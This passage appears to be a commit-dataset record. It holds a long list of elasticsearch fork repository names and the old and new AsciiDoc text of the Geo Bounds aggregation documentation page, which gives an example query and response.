lasticsearch,pranavraman\/elasticsearch,infusionsoft\/elasticsearch,Charlesdong\/elasticsearch,lzo\/elasticsearch-1,chrismwendt\/elasticsearch,nellicus\/elasticsearch,kimimj\/elasticsearch,StefanGor\/elasticsearch,Rygbee\/elasticsearch,cwurm\/elasticsearch,ydsakyclguozi\/elasticsearch,alexkuk\/elasticsearch,vvcephei\/elasticsearch,springning\/elasticsearch,yanjunh\/elasticsearch,mcku\/elasticsearch,likaiwalkman\/elasticsearch,humandb\/elasticsearch,palecur\/elasticsearch,mmaracic\/elasticsearch,beiske\/elasticsearch,C-Bish\/elasticsearch,KimTaehee\/elasticsearch,petabytedata\/elasticsearch,luiseduardohdbackup\/elasticsearch,rajanm\/elasticsearch,kevinkluge\/elasticsearch,jango2015\/elasticsearch,robin13\/elasticsearch,zeroctu\/elasticsearch,iacdingping\/elasticsearch,xingguang2013\/elasticsearch,umeshdangat\/elasticsearch,sjohnr\/elasticsearch,TonyChai24\/ESSource,sneivandt\/elasticsearch,kcompher\/elasticsearch,snikch\/elasticsearch,kunallimaye\/elasticsearch,rmuir\/elasticsearch,zkidkid\/elasticsearch,ZTE-PaaS\/elasticsearch,truemped\/elasticsearch,tahaemin\/elasticsearch,mmaracic\/elasticsearch,ivansun1010\/elasticsearch,winstonewert\/elasticsearch,mm0\/elasticsearch,LeoYao\/elasticsearch,jbertouch\/elasticsearch,onegambler\/elasticsearch,JSCooke\/elasticsearch,masterweb121\/elasticsearch,naveenhooda2000\/elasticsearch,nomoa\/elasticsearch,jpountz\/elasticsearch,ZTE-PaaS\/elasticsearch,Charlesdong\/elasticsearch,amaliujia\/elasticsearch,s1monw\/elasticsearch,nrkkalyan\/elasticsearch,LeoYao\/elasticsearch,djschny\/elasticsearch,caengcjd\/elasticsearch,javachengwc\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kenshin233\/elasticsearch,LewayneNaidoo\/elasticsearch,Widen\/elasticsearch,koxa29\/elasticsearch,overcome\/elasticsearch,kalburgimanjunath\/elasticsearch,apepper\/elasticsearch,amaliujia\/elasticsearch,slavau\/elasticsearch,fernandozhu\/elasticsearch,SergVro\/elasticsearch,yanjunh\/elasticsearch,ydsakyclguozi\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,strapdata\/elassandra-test,Fsero\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,artnowo\/elasticsearch,JackyMai\/elasticsearch,vietlq\/elasticsearch,zhiqinghuang\/elasticsearch,nrkkalyan\/elasticsearch,andrestc\/elasticsearch,SergVro\/elasticsearch,tsohil\/elasticsearch,andrestc\/elasticsearch,lmtwga\/elasticsearch,pozhidaevak\/elasticsearch,alexbrasetvik\/elasticsearch,yuy168\/elasticsearch,knight1128\/elasticsearch,camilojd\/elasticsearch,ulkas\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,kubum\/elasticsearch,GlenRSmith\/elasticsearch,Fsero\/elasticsearch,bawse\/elasticsearch,MisterAndersen\/elasticsearch,codebunt\/elasticsearch,elancom\/elasticsearch,knight1128\/elasticsearch,mohit\/elasticsearch,kubum\/elasticsearch,yanjunh\/elasticsearch,kalburgimanjunath\/elasticsearch,palecur\/elasticsearch,strapdata\/elassandra,mute\/elasticsearch,iacdingping\/elasticsearch,vvcephei\/elasticsearch,humandb\/elasticsearch,a2lin\/elasticsearch,Siddartha07\/elasticsearch,wayeast\/elasticsearch,pranavraman\/elasticsearch,linglaiyao1314\/elasticsearch,hafkensite\/elasticsearch,lzo\/elasticsearch-1,Flipkart\/elasticsearch,hirdesh2008\/elasticsearch,weipinghe\/elasticsearch,myelin\/elasticsearch,ImpressTV\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,drewr\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,feiqitian\/elasticsearch,markharwood\/elasticsearch,adrianbk\/elasticsearch,awislowski\/elasticsearch,Widen\/elasticsearch,kevinkluge\/elasticsearch,kimimj\/elasticsearch,Brijeshrpatel9\/elasticsearch,MetSystem\/elasticsearch,mohit\/elasticsearch,F0lha\/elasticsearch,mcku\/elasticsearch,wbowling\/elasticsearch,weipinghe\/elasticsearch,episerver\/elasticsearch,mmaracic\/elasticsearch,kunallimaye\/elasticsearch,kingaj\/elasticsearch,zhiqinghuang\/elasticsearch,hirdesh2008\/elasticsearch,kkirsche\/elasticsearch,zhiqinghuang\/elasticsearch,ThalaivaStars\/OrgRepo1,hydro2k\/elasticsearch,yongminxia\/elasticsearch,fooljohnny\/elasticsearch,ydsakyclguozi\/elasticsearch,vvcephei\/elasticsearch,nknize\/elasticsearch,martinstuga\/elasticsearch,golubev\/elasticsearch,luiseduardohdbackup\/elasticsearch,hanswang\/elasticsearch,jaynblue\/elasticsearch,trangvh\/elasticsearch,kalburgimanjunath\/elasticsearch,kingaj\/elasticsearch,heng4fun\/elasticsearch,pranavraman\/elasticsearch,jango2015\/elasticsearch,uschindler\/elasticsearch,dongjoon-hyun\/elasticsearch,linglaiyao1314\/elasticsearch,clintongormley\/elasticsearch,apepper\/elasticsearch,C-Bish\/elasticsearch,EasonYi\/elasticsearch,spiegela\/elasticsearch,khiraiwa\/elasticsearch,Microsoft\/elasticsearch,mortonsykes\/elasticsearch,ricardocerq\/elasticsearch,JackyMai\/elasticsearch,wbowling\/elasticsearch,Widen\/elasticsearch,sc0ttkclark\/elasticsearch,jimhooker2002\/elasticsearch,jeteve\/elasticsearch,HarishAtGitHub\/elasticsearch,ckclark\/elasticsearch,lmtwga\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra,mnylen\/elasticsearch,fooljohnny\/elasticsearch,Stacey-Gammon\/elasticsearch,hanst\/elasticsearch,springning\/elasticsearch,kimimj\/elasticsearch,anti-social\/elasticsearch,btiernay\/elasticsearch,nomoa\/elasticsearch,Shepard1212\/elasticsearch,yongminxia\/elasticsearch,vroyer\/elasticassandra,golubev\/elasticsearch,scottsom\/elasticsearch,bestwpw\/elasticsearch,dataduke\/elasticsearch,Kakakakakku\/elasticsearch,maddin2016\/elasticsearch,djschny\/elasticsearch,i-am-Nathan\/elasticsearch,kaneshin\/elasticsearch,yongminxia\/elasticsearch,xingguang2013\/elasticsearch,andrestc\/elasticsearch,kevinkluge\/elasticsearch,scorpionvicky\/elasticsearch,nellicus\/elasticsearch,koxa29\/elasticsearch,lightslife\/elasticsearch,umeshdangat\/elasticsearch,tkssharma\/elasticsearch,ricardocerq\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,Uiho\/elasticsearch,C-Bish\/elasticsearch,glefloch\/elasticsearch,yynil\/elasticsearch,Kakakakakku\/elasticsearch,onegambler\/elasticsearch,MichaelLiZhou\/elasticsearch,djschny\/elasticsearch,masterweb121\/elasticsearch,kevinkluge\/elasticsearch,Shepard1212\/elasticsearch,vietlq\/elasticsearch,s1monw\/elasticsearch,beiske\/elasticsearch,Shekharrajak\/elasticsearch,AshishThakur\/elasticsearch,ricardocerq\/elasticsearch,camilojd\/elasticsearch,jw0201\/elastic,jimczi\/elasticsearch,Liziyao\/elasticsearch,rmuir\/elasticsearch,Siddartha07\/elasticsearch,linglaiyao1314\/elasticsearch,hafkensite\/elasticsearch,Collaborne\/elasticsearch,mgalushka\/elasticsearch,shreejay\/elasticsearch,YosuaMichael\/elasticsearch,tsohil\/elasticsearch,Collaborne\/elasticsearch,fforbeck\/elasticsearch,kcompher\/elasticsearch,MichaelLiZhou\/elasticsearch,rajanm\/elasticsearch,caengcjd\/elasticsearch,yongminxia\/elasticsearch,djschny\/elasticsearch,dataduke\/elasticsearch,sneivandt\/elasticsearch,ckclark\/elasticsearch,ThalaivaStars\/OrgRepo1,smflorentino\/elasticsearch,Asimov4\/elasticsearch,jpountz\/elasticsearch,khiraiwa\/elasticsearch,alexbrasetvik\/elasticsearch,gfyoung\/elasticsearch,henakamaMSFT\/elasticsearch,schonfeld\/elasticsearch,lydonchandra\/elasticsearch,weipinghe\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kaneshin\/elasticsearch,Microsoft\/elasticsearch,Widen\/elasticsearch,humandb\/elasticsearch,brandonkearby\/elasticsearch,adrianbk\/elasticsearch,Clairebi\/ElasticsearchClone,rmuir\/elasticsearch,mute\/elasticsearch,masterweb121\/elasticsearch,mute\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,bestwpw\/elasticsearch,sauravmondallive\/elasticsearch,wangtuo\/elasticsearch,linglaiyao1314\/elasticsearch,jsgao0\/elasticsearch,mohit\/elasticsearch,drewr\/elasticsearch,queirozfcom\/elasticsearch,jimczi\/elasticsearch,martinstuga\/elasticsearch,YosuaMichael\/elasticsearch,PhaedrusTheGreek\/elasticsearch,humandb\/elasticsearch,Charlesdong\/elasticsearch,kalimatas\/elasticsearch,jpountz\/elasticsearch,overcome\/elasticsearch,Rygbee\/elasticsearch,sneivandt\/elasticsearch,markharwood\/elasticsearch,jw0201\/elastic,ivansun1010\/elasticsearch,martinstuga\/elasticsearch,NBSW\/elasticsearch,wuranbo\/elasticsearch,vroyer\/elasticassandra,wuranbo\/elasticsearch,fred84\/elasticsearch,ThalaivaStars\/OrgRepo1,jango2015\/elasticsearch,sauravmondallive\/elasticsearch,phani546\/elasticsearch,ImpressTV\/elasticsearch,huanzhong\/elasticsearch,mkis-\/elasticsearch,mkis-\/elasticsearch,ESamir\/elasticsearch,fforbeck\/elasticsearch,obourgain\/elasticsearch,Shekharrajak\/elasticsearch,wangyuxue\/elasticsearch,queirozfcom\/elasticsearch,kingaj\/elasticsearch,petabytedata\/elasticsearch,hanst\/elasticsearch,uschindler\/elasticsearch,ivansun1010\/elasticsearch,onegambler\/elasticsearch,MjAbuz\/elasticsearch,rajanm\/elasticsearch,jaynblue\/elasticsearch,girirajsharma\/elasticsearch,wayeast\/elasticsearch,strapdata\/elassandra,lightslife\/elasticsearch,mute\/elasticsearch,JervyShi\/elasticsearch,achow\/elasticsearch,pablocastro\/elasticsearch,jpountz\/elasticsearch,episerver\/elasticsearch,springning\/elasticsearch,JackyMai\/elasticsearch,petabytedata\/elasticsearch,socialrank\/elasticsearch,vrkansagara\/elasticsearch,javachengwc\/elasticsearch,petabytedata\/elasticsearch,strapdata\/elassandra5-rc,adrianbk\/elasticsearch,ESamir\/elasticsearch,camilojd\/elasticsearch,uschindler\/elasticsearch,javachengwc\/elasticsearch,Clairebi\/ElasticsearchClone,lks21c\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nrkkalyan\/elasticsearch,kalburgimanjunath\/elasticsearch,kkirsche\/elasticsearch,xuzha\/elasticsearch,kunallimaye\/elasticsearch,sarwarbhuiyan\/elasticsearch,sposam\/elasticsearch,geidies\/elasticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,yynil\/elasticsearch,Siddartha07\/elasticsearch,PhaedrusTheGreek\/elasticsearch,vingupta3\/elasticsearch,xpandan\/elasticsearch,MjAbuz\/elasticsearch,humandb\/elasticsearch,chrismwendt\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,fooljohnny\/elasticsearch,hechunwen\/elasticsearch,codebunt\/elasticsearch,GlenRSmith\/elasticsearch,thecocce\/elasticsearch,EasonYi\/elasticsearch,sposam\/elasticsearch,strapdata\/elassandra-test,dpursehouse\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,nezirus\/elasticsearch,markwalkom\/elasticsearch,zkidkid\/elasticsearch,lightslife\/elasticsearch,andrestc\/elasticsearch,hechunwen\/elasticsearch,lmtwga\/elasticsearch,pritishppai\/elasticsearch,rmuir\/elasticsearch,wittyameta\/elasticsearch,palecur\/elasticsearch,tebriel\/elasticsearch,tkssharma\/elasticsearch,amit-shar\/elasticsearch,kcompher\/elasticsearch,abibell\/elasticsearch,zhiqinghuang\/elasticsearch,rlugojr\/elasticsearch,cnfire\/elasticsearch-1,acchen97\/elasticsearch,JackyMai\/elasticsearch,khiraiwa\/elasticsearch,F0lha\/elasticsearch,himanshuag\/elasticsearch,queirozfcom\/elasticsearch,kenshin233\/elasticsearch,sjohnr\/elasticsearch,kalburgimanjunath\/elasticsearch,AndreKR\/elasticsearch,Ansh90\/elasticsearch,gingerwizard\/elasticsearch,slavau\/elasticsearch,humandb\/elasticsearch,sreeramjayan\/elasticsearch,liweinan0423\/elasticsearch,loconsolutions\/elasticsearch,ivansun1010\/elasticsearch,mohit\/elasticsearch,skearns64\/elasticsearch,knight1128\/elasticsearch,hanst\/elasticsearch,btiernay\/elasticsearch,qwerty4030\/elasticsearch,elancom\/elasticsearch,sarwarbhuiyan\/elasticsearch,SergVro\/elasticsearch,huypx1292\/elasticsearch,acchen97\/elasticsearch,franklanganke\/elasticsearch,markllama\/elasticsearch,ImpressTV\/elasticsearch,martinstuga\/elasticsearch,Ansh90\/elasticsearch,JervyShi\/elasticsearch,tebriel\/elasticsearch,fekaputra\/elasticsearch,polyfractal\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,onegambler\/elasticsearch,dpursehouse\/elasticsearch,sposam\/elasticsearch,shreejay\/elasticsearch,JervyShi\/elasticsearch,mjhennig\/elasticsearch,umeshdangat\/elasticsearch,kcompher\/elasticsearch,amit-shar\/elasticsearch,phani546\/elasticsearch,iantruslove\/elasticsearch,jprante\/elasticsearch,wimvds\/elasticsearch,hirdesh2008\/elasticsearch,lzo\/elasticsearch-1,ouyangkongtong\/elasticsearch,xuzha\/elasticsearch,ydsakyclguozi\/elasticsearch,khiraiwa\/elasticsearch,wbowling\/elasticsearch,zkidkid\/elasticsearch,davidvgalbraith\/elasticsearch,milodky\/elasticsearch,qwerty4030\/elasticsearch,himanshuag\/elasticsearch,skearns64\/elasticsearch,LeoYao\/elasticsearch,AndreKR\/elasticsearch,Ansh90\/elasticsearch,markharwood\/elasticsearch,thecocce\/elasticsearch,areek\/elasticsearch,masaruh\/elasticsearch,infusionsoft\/elasticsearch,alexbrasetvik\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,vingupta3\/elasticsearch,lchennup\/elasticsearch,smflorentino\/elasticsearch,diendt\/elasticsearch,Collaborne\/elasticsearch,nilabhsagar\/elasticsearch,chrismwendt\/elasticsearch,fred84\/elasticsearch,jw0201\/elastic,Brijeshrpatel9\/elasticsearch,huypx1292\/elasticsearch,ricardocerq\/elasticsearch,nknize\/elasticsearch,mapr\/elasticsearch,lmtwga\/elasticsearch,Fsero\/elasticsearch,rhoml\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,kaneshin\/elasticsearch,zeroctu\/elasticsearch,TonyChai24\/ESSource,schonfeld\/elasticsearch,rmuir\/elasticsearch,tkssharma\/elasticsearch,ckclark\/elasticsearch,mrorii\/elasticsearch,chirilo\/elasticsearch,TonyChai24\/ESSource,alexshadow007\/elasticsearch,tsohil\/elasticsearch,koxa29\/elasticsearch,jaynblue\/elasticsearch,ivansun1010\/elasticsearch,avikurapati\/elasticsearch,franklanganke\/elasticsearch,wbowling\/elasticsearch,gmarz\/elasticsearch,Rygbee\/elasticsearch,davidvgalbraith\/elasticsearch,trangvh\/elasticsearch,Uiho\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,kubum\/elasticsearch,GlenRSmith\/elasticsearch,cwurm\/elasticsearch,Liziyao\/elasticsearch,dongjoon-hyun\/elasticsearch,nezirus\/elasticsearch,sarwarbhuiyan\/elasticsearch,tebriel\/elasticsearch,feiqitian\/elasticsearch,gingerwizard\/elasticsearch,18098924759\/elasticsearch,rento19962\/elasticsearch,yynil\/elasticsearch,bawse\/elasticsearch,pritishppai\/elasticsearch,EasonYi\/elasticsearch,alexbrasetvik\/elasticsearch,dylan8902\/elasticsearch,fooljohnny\/elasticsearch,abibell\/elasticsearch,franklanganke\/elasticsearch,F0lha\/elasticsearch,beiske\/elasticsearch,mrorii\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,beiske\/elasticsearch,dpursehouse\/elasticsearch,zkidkid\/elasticsearch,jsgao0\/elasticsearch,cnfire\/elasticsearch-1,milodky\/elasticsearch,vietlq\/elasticsearch,geidies\/elasticsearch,djschny\/elasticsearch,Asimov4\/elasticsearch,jeteve\/elasticsearch,alexkuk\/elasticsearch,zeroctu\/elasticsearch,Shekharrajak\/elasticsearch,knight1128\/elasticsearch,trangvh\/elasticsearch,gmarz\/elasticsearch,caengcjd\/elasticsearch,yongminxia\/elasticsearch,mjhennig\/elasticsearch,iacdingping\/elasticsearch,girirajsharma\/elasticsearch,milodky\/elasticsearch,MjAbuz\/elasticsearch,btiernay\/elasticsearch,MisterAndersen\/elasticsearch,onegambler\/elasticsearch,huanzhong\/elasticsearch,smflorentino\/elasticsearch,cnfire\/elasticsearch-1,kimimj\/elasticsearch,polyfractal\/elasticsearch,hanst\/elasticsearch,awislowski\/elasticsearch,Asimov4\/elasticsearch,pablocastro\/elasticsearch,nazarewk\/elasticsearch,phani546\/elasticsearch,Fsero\/elasticsearch,TonyChai24\/ESSource,MetSystem\/elasticsearch,achow\/elasticsearch,wayeast\/elasticsearch,humandb\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,areek\/elasticsearch,yynil\/elasticsearch,luiseduardohdbackup\/elasticsearch,JSCooke\/elasticsearch,AndreKR\/elasticsearch,bestwpw\/elasticsearch,episerver\/elasticsearch,hechunwen\/elasticsearch,jango2015\/elasticsearch,Kakakakakku\/elasticsearch,bawse\/elasticsearch,Widen\/elasticsearch,hydro2k\/elasticsearch,MisterAndersen\/elasticsearch,yuy168\/elasticsearch,winstonewert\/elasticsearch,masterweb121\/elasticsearch,xingguang2013\/elasticsearch,Siddartha07\/elasticsearch,HarishAtGitHub\/elasticsearch,dongjoon-hyun\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,tkssharma\/elasticsearch,ImpressTV\/elasticsearch,winstonewert\/elasticsearch,mnylen\/elasticsearch,lydonchandra\/elasticsearch,karthikjaps\/elasticsearch,elasticdog\/elasticsearch,MjAbuz\/elasticsearch,mgalushka\/elasticsearch,wangyuxue\/elasticsearch,MichaelLiZhou\/elasticsearch,liweinan0423\/elasticsearch,petabytedata\/elasticsearch,hanswang\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,LewayneNaidoo\/elasticsearch,mjason3\/elasticsearch,sarwarbhuiyan\/elasticsearch,iamjakob\/elasticsearch,btiernay\/elasticsearch,IanvsPoplicola\/elasticsearch,jchampion\/elasticsearch,kalimatas\/elasticsearch,mkis-\/elasticsearch,hirdesh2008\/elasticsearch,ckclark\/elasticsearch,strapdata\/elassandra-test,zhiqinghuang\/elasticsearch,areek\/elasticsearch,lzo\/elasticsearch-1,girirajsharma\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,ulkas\/elasticsearch,queirozfcom\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,jw0201\/elastic,amit-shar\/elasticsearch,fooljohnny\/elasticsearch,PhaedrusTheGreek\/elasticsearch,LewayneNaidoo\/elasticsearch,himanshuag\/elasticsearch,cwurm\/elasticsearch,achow\/elasticsearch,ydsakyclguozi\/elasticsearch,Chhunlong\/elasticsearch,kaneshin\/elasticsearch,i-am-Nathan\/elasticsearch,kcompher\/elasticsearch,wimvds\/elasticsearch,sdauletau\/elasticsearch,avikurapati\/elasticsearch,djschny\/elasticsearch,amaliujia\/elasticsearch,jimczi\/elasticsearch,snikch\/elasticsearch,aglne\/elasticsearch,sauravmondallive\/elasticsearch,ESamir\/elasticsearch,brandonkearby\/elasticsearch,MichaelLiZhou\/elasticsearch,knight1128\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,pritishppai\/elasticsearch,TonyChai24\/ESSource,strapdata\/elassandra,spiegela\/elasticsearch,beiske\/elasticsearch,yuy168\/elasticsearch,loconsolutions\/elasticsearch,jimhooker2002\/elasticsearch,caengcjd\/elasticsearch,achow\/elasticsearch,Brijeshrpatel9\/elasticsearch,jbertouch\/elasticsearch,drewr\/elasticsearch,ouyangkongtong\/elasticsearch,YosuaMichael\/elasticsearch,MisterAndersen\/elasticsearch,pranavraman\/elasticsearch,kingaj\/elasticsearch,petabytedata\/elasticsearch,karthikjaps\/elasticsearch,JSCooke\/elasticsearch,PhaedrusTheGreek\/elasticsearch,overcome\/elasticsearch,likaiwalkman\/elasticsearch,geidies\/elasticsearch,koxa29\/elasticsearch,KimTaehee\/elasticsearch,Kakakakakku\/elasticsearch,andrejserafim\/elasticsearch,hirdesh2008\/elasticsearch,clintongormley\/elasticsearch,andrejserafim\/elasticsearch,thecocce\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Collaborne\/elasticsearch,himanshuag\/elasticsearch,Chhunlong\/elasticsearch,pozhidaevak\/elasticsearch,Chhunlong\/elasticsearch,rhoml\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,Kakakakakku\/elasticsearch,qwerty4030\/elasticsearch,YosuaMichael\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mmaracic\/elasticsearch,KimTaehee\/elasticsearch,hafkensite\/elasticsearch,Uiho\/elasticsearch,weipinghe\/elasticsearch,apepper\/elasticsearch,mohit\/elasticsearch,mgalushka\/elasticsearch,jw0201\/elastic,sdauletau\/elasticsearch,nezirus\/elasticsearch,zeroctu\/elasticsearch,Brijeshrpatel9\/elasticsearch,mjhennig\/elasticsearch,caengcjd\/elasticsearch,masterweb121\/elasticsearch,mbrukman\/elasticsearch,golubev\/elasticsearch,Uiho\/elasticsearch,mcku\/elasticsearch,NBSW\/elasticsearch,hanswang\/elasticsearch,jbertouch\/elasticsearch,kunallimaye\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,jpountz\/elasticsearch,fooljohnny\/elasticsearch,Charlesdong\/elasticsearch,hechunwen\/elasticsearch,socialrank\/elasticsearch,mbrukman\/elasticsearch,sdauletau\/elasticsearch,ydsakyclguozi\/elasticsearch,Microsoft\/elasticsearch,Brijeshrpatel9\/elasticsearch,alexbrasetvik\/elasticsearch,F0lha\/elasticsearch,milodky\/elasticsearch,kalimatas\/elasticsearch,skearns64\/elasticsearch,mute\/elasticsearch,wittyameta\/elasticsearch,sposam\/elasticsearch,wuranbo\/elasticsearch,luiseduardohdbackup\/elasticsearch,iacdingping\/elasticsearch,socialrank\/elasticsearch,slavau\/elasticsearch,geidies\/elasticsearch,kenshin233\/elasticsearch,apepper\/elasticsearch,MichaelLiZhou\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,kcompher\/elasticsearch,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,tkssharma\/elasticsearch,javachengwc\/elasticsearch,nomoa\/elasticsearch,rento19962\/elasticsearch,vingupta3\/elasticsearch,lightslife\/elasticsearch,diendt\/elasticsearch,pritishppai\/elasticsearch,KimTaehee\/elasticsearch,yuy168\/elasticsearch,mapr\/elasticsearch,Ansh90\/elasticsearch,dataduke\/elasticsearch,tebriel\/elasticsearch,tebriel\/elasticsearch,jchampion\/elasticsearch,Uiho\/elasticsearch,anti-social\/elasticsearch,hanst\/elasticsearch,vroyer\/elassandra,hafkensite\/elasticsearch,spiegela\/elasticsearch,zkidkid\/elasticsearch,18098924759\/elasticsearch,tsohil\/elasticsearch,yuy168\/elasticsearch,easonC\/elasticsearch,markharwood\/elasticsearch,xpandan\/elasticsearch,njlawton\/elasticsearch,NBSW\/elasticsearch,mm0\/elasticsearch,beiske\/elasticsearch,fekaputra\/elasticsearch,winstonewert\/elasticsearch,sposam\/elasticsearch,cwurm\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,markllama\/elasticsearch,sneivandt\/elasticsearch,rhoml\/elasticsearch,ulkas\/elasticsearch,alexbrasetvik\/elasticsearch,liweinan0423\/elasticsearch,scottsom\/elasticsearch,HarishAtGitHub\/elasticsearch,jchampion\/elasticsearch,jbertouch\/elasticsearch,girirajsharma\/elasticsearch,markllama\/elasticsearch,truemped\/elasticsearch,yongminxia\/elasticsearch,apepper\/elasticsearch,sarwarbhuiyan\/elasticsearch,18098924759\/elasticsearch,Ansh90\/elasticsearch,Stacey-Gammon\/elasticsearch,sreeramjayan\/elasticsearch,truemped\/elasticsearch,sarwarbhuiyan\/elasticsearch,mikemccand\/elasticsearch,aglne\/elasticsearch,naveenhooda2000\/elasticsearch,vrkansagara\/elasticsearch,zeroctu\/elasticsearch,vrkansagara\/elasticsearch,IanvsPoplicola\/elasticsearch,apepper\/elasticsearch,ThalaivaStars\/OrgRepo1,wimvds\/elasticsearch,queirozfcom\/elasticsearch,martinstuga\/elasticsearch,sarwarbhuiyan\/elasticsearch,sdauletau\/elasticsearch,tkssharma\/elasticsearch,zhiqinghuang\/elasticsearch,jpountz\/elasticsearch,mortonsykes\/elasticsearch,bestwpw\/elasticsearch,i-am-Nathan\/elasticsearch,amit-shar\/elasticsearch,acchen97\/elasticsearch,MisterAndersen\/elasticsearch,episerver\/elasticsearch,iacdingping\/elasticsearch,MjAbuz\/elasticsearch,s1monw\/elasticsearch,areek\/elasticsearch,elancom\/elasticsearch,Clairebi\/ElasticsearchClone,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,Flipkart\/elasticsearch,njlawton\/elasticsearch,aglne\/elasticsearch,huanzhong\/elasticsearch,kcompher\/elasticsearch,chrismwendt\/elasticsearch,drewr\/elasticsearch,JervyShi\/elasticsearch,kingaj\/elasticsearch,xuzha\/elasticsearch,MjAbuz\/elasticsearch,mjason3\/elasticsearch,jimhooker2002\/elasticsearch,HarishAtGitHub\/elasticsearch,artnowo\/elasticsearch,wittyameta\/elasticsearch,KimTaehee\/elasticsearch,ThalaivaStars\/OrgRepo1,thecocce\/elasticsearch,MetSystem\/elasticsearch,HarishAtGitHub\/elasticsearch,mm0\/elasticsearch,huanzhong\/elasticsearch,ckclark\/elasticsearch,Helen-Zhao\/elasticsearch,hydro2k\/elasticsearch,iamjakob\/elasticsearch,beiske\/elasticsearch,schonfeld\/elasticsearch,hanswang\/elasticsearch,lightslife\/elasticsearch,weipinghe\/elasticsearch,lydonchandra\/elasticsearch,mm0\/elasticsearch,aglne\/elasticsearch,mgalushka\/elasticsearch,njlawton\/elasticsearch,MaineC\/elasticsearch,truemped\/elasticsearch,NBSW\/elasticsearch,davidvgalbraith\/elasticsearch,jsgao0\/elasticsearch,kimimj\/elasticsearch,sc0ttkclark\/elasticsearch,mkis-\/elasticsearch,palecur\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Brijeshrpatel9\/elasticsearch,polyfractal\/elasticsearch,fforbeck\/elasticsearch,nellicus\/elasticsearch,dataduke\/elasticsearch,Brijeshrpatel9\/elasticsearch,lchennup\/elasticsearch,truemped\/elasticsearch,Uiho\/elasticsearch,infusionsoft\/elasticsearch,mute\/elasticsearch,myelin\/elasticsearch,infusionsoft\/elasticsearch,robin13\/elasticsearch,vingupta3\/elasticsearch,mbrukman\/elasticsearch,jprante\/elasticsearch,wbowling\/elasticsearch,yanjunh\/elasticsearch,andrejserafim\/elasticsearch,huanzhong\/elasticsearch,coding0011\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,linglaiyao1314\/elasticsearch,heng4fun\/elasticsearch,wimvds\/elasticsearch,mortonsykes\/elasticsearch,lchennup\/elasticsearch,acchen97\/elasticsearch,wenpos\/elasticsearch,sposam\/elasticsearch,feiqitian\/elasticsearch,kunallimaye\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,feiqitian\/elasticsearch,lchennup\/elasticsearch,jw0201\/elastic,Liziyao\/elasticsearch,nezirus\/elasticsearch,18098924759\/elasticsearch,jeteve\/elasticsearch,Asimov4\/elasticsearch,girirajsharma\/elasticsearch,henakamaMSFT\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : {\n \"geo_bounds\" : {\n \"field\" : \"location\", <1>\n \"wrap_longitude\" : true <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","old_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : 